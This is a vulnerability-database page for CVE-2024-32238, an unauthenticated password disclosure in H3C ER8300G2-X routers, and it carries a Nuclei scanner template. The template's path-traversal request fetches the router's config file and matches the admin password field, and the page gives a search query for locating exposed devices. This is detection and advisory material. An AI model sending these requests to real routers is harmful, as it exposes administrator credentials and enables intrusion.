| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| H3C ER8300G2-X 安全漏洞 | 22 Apr 202400:00 | – | cnnvd | |
| CVE-2024-32238 | 22 Apr 202400:00 | – | cve | |
| CVE-2024-32238 | 22 Apr 202400:00 | – | cvelist | |
| CVE-2024-32238 | 22 Apr 202420:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 202100:00 | – | openvas | |
| PT-2024-24469 · H3C · H3C Er8300G2-X | 22 Apr 202400:00 | – | ptsecurity | |
| CVE-2024-32238 | 23 May 202508:36 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-32238 | 27 Feb 202500:00 | – | vulncheck_kev | |
| CVE-2024-32238 | 22 Apr 202400:00 | – | vulnrichment |
id: CVE-2024-32238
info:
name: H3C ER8300G2-X - Password Disclosure
author: s4e-io,adeljck
severity: critical
description: |
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
impact: |
Unauthenticated attackers can access the router's administrative password via the management system interface.
remediation: |
Update H3C ER8300G2-X router firmware to a version that addresses the password disclosure vulnerability.
reference:
- https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
- https://github.com/asdfjkl11/CVE-2024-32238/issues/1
- https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
- https://github.com/20142995/nuclei-templates
- https://github.com/FuBoLuSec/CVE-2024-32238
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-32238
cwe-id: CWE-522
epss-score: 0.53229
epss-percentile: 0.98853
metadata:
verified: true
max-request: 2
fofa-query: body="icg_helpScript.js"
tags: cve,cve2024,h3c,router,info-leak,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /userLogin.asp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: module_name
part: body
internal: true
group: 1
regex:
- "<title>([A-Za-z0-9-]+)系统管理</title>"
- raw:
- |
GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(content_type, "application/x-unknown")'
- 'contains_all(body, "admpwd=", "auxauthmode=")'
- 'contains(server, "H3C-Miniware")'
condition: and
# digest: 4b0a00483046022100db6e2955fa13e7d3f1ce5d652b7fa7387056f165a07f300ca8ea24362f693066022100c522fc0a8904b289f624f1316fb9372c07a25741d6f631d1662aa92a09f2b7b8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation